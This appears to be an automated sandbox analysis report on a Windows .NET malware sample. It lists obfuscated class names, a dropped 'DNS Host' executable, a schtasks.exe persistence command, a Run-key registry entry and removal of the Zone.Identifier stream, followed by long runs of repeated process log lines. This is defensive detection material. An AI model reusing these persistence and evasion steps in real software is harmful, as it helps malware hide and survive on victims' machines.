Source: 0.2.nD2ozRD7MN.exe.4a25f80.1.raw.unpack, GPreDaRCfFsC4saotE.cs	High entropy of concatenated method names: 'O7O82kNxOU', 'knJ8aiQnmB', 'jZo8C38Vl7', 'qtK895ktY3', 'wKd8geoEgs', 'mn2878CvQk', 'Next', 'Next', 'Next', 'NextBytes'
Source: 0.2.nD2ozRD7MN.exe.4a25f80.1.raw.unpack, fykWaJN4YqARddZSYT.cs	High entropy of concatenated method names: 'RSGQdN6Aii', 'eBPQfnCA7q', 'E92Qjld9wR', 'QbNQFZKCNK', 'zZ7QZcyNfw', 'KWnQAol8wJ', 'EIdZZyAqXCl8JVkrF1', 'oHaa00ax5nc60rNfT4', 'xaQQQNdMlv', 'RauQcg3RJf'
Source: 0.2.nD2ozRD7MN.exe.4a25f80.1.raw.unpack, vb78FfKwGRxSVQKyGV5.cs	High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'i6Vugi9GFh', 'TKsuIWiolU', 'DS9uBD69FY', 'om0uT9iCrB', 'sqtus3BkW7', 'FONukN9CW8', 'dZZuMgkZve'
Source: 0.2.nD2ozRD7MN.exe.4a25f80.1.raw.unpack, gjKo6oOIHk6yJCaogO.cs	High entropy of concatenated method names: 'Dispose', 'CnJQemUAM1', 'M3dEaJg5f6', 'CLpJJBkt3J', 'gKyQXPBEAk', 'icwQzfUg7R', 'ProcessDialogKey', 'iAOEVS1iMT', 'MQdEQaVB6k', 'lunEEHxh4l'
Source: 0.2.nD2ozRD7MN.exe.4a25f80.1.raw.unpack, v23u6iYSQ5Vfhhyo6Y.cs	High entropy of concatenated method names: 'u6QHqnYCjW', 'SVpHSHLtGB', 'NnhHPFW3iE', 'e2MHOC3YlT', 'NauHZwdBpL', 'rFYHAlBq4p', 'iGRH1TaI3D', 'Jq3H8jeAwu', 'C8ZHRXNDTY', 'BrkHuWTDyJ'

Source: C:\Users\user\Desktop\nD2ozRD7MN.exe

File created: C:\Program Files (x86)\DNS Host\dnshost.exe

Jump to dropped file

Boot Survival

Uses schtasks.exe or at.exe to add and modify task schedules

Source: C:\Users\user\Desktop\nD2ozRD7MN.exe

Process created: C:\Windows\SysWOW64\schtasks.exe "schtasks.exe" /create /f /tn "DNS Host" /xml "C:\Users\user\AppData\Local\Temp\tmpC5F1.tmp"

Source: C:\Users\user\Desktop\nD2ozRD7MN.exe	Registry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run DNS Host			Jump to behavior
Source: C:\Users\user\Desktop\nD2ozRD7MN.exe	Registry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run DNS Host			Jump to behavior

Hooking and other Techniques for Hiding and Protection

Hides that the sample has been downloaded from the Internet (zone.identifier)

Source: C:\Users\user\Desktop\nD2ozRD7MN.exe

File opened: C:\Users\user\Desktop\nD2ozRD7MN.exe:Zone.Identifier read attributes | delete

Jump to behavior

Loading BitLocker PowerShell Module

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1

Source: C:\Users\user\Desktop\nD2ozRD7MN.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\nD2ozRD7MN.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\nD2ozRD7MN.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\nD2ozRD7MN.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\nD2ozRD7MN.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\nD2ozRD7MN.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\nD2ozRD7MN.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\nD2ozRD7MN.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\nD2ozRD7MN.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\nD2ozRD7MN.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\nD2ozRD7MN.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\nD2ozRD7MN.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\nD2ozRD7MN.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\nD2ozRD7MN.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\nD2ozRD7MN.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\nD2ozRD7MN.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\nD2ozRD7MN.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\nD2ozRD7MN.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\nD2ozRD7MN.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\nD2ozRD7MN.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\nD2ozRD7MN.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\nD2ozRD7MN.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\nD2ozRD7MN.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\nD2ozRD7MN.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\nD2ozRD7MN.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\nD2ozRD7MN.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\nD2ozRD7MN.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\nD2ozRD7MN.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\nD2ozRD7MN.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\nD2ozRD7MN.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\nD2ozRD7MN.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\nD2ozRD7MN.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\nD2ozRD7MN.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\nD2ozRD7MN.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\nD2ozRD7MN.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\nD2ozRD7MN.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\nD2ozRD7MN.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\nD2ozRD7MN.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\nD2ozRD7MN.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\nD2ozRD7MN.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\nD2ozRD7MN.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\nD2ozRD7MN.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\nD2ozRD7MN.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\nD2ozRD7MN.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\nD2ozRD7MN.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\nD2ozRD7MN.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\nD2ozRD7MN.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\nD2ozRD7MN.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\nD2ozRD7MN.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\nD2ozRD7MN.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\nD2ozRD7MN.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\nD2ozRD7MN.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\nD2ozRD7MN.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\nD2ozRD7MN.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\nD2ozRD7MN.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\nD2ozRD7MN.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\nD2ozRD7MN.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\nD2ozRD7MN.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\nD2ozRD7MN.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\nD2ozRD7MN.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\nD2ozRD7MN.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\nD2ozRD7MN.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\nD2ozRD7MN.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\nD2ozRD7MN.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\nD2ozRD7MN.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\nD2ozRD7MN.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\nD2ozRD7MN.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\nD2ozRD7MN.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\nD2ozRD7MN.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\nD2ozRD7MN.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\nD2ozRD7MN.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\nD2ozRD7MN.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\nD2ozRD7MN.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\nD2ozRD7MN.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\nD2ozRD7MN.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\nD2ozRD7MN.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\nD2ozRD7MN.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\nD2ozRD7MN.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\nD2ozRD7MN.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\nD2ozRD7MN.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
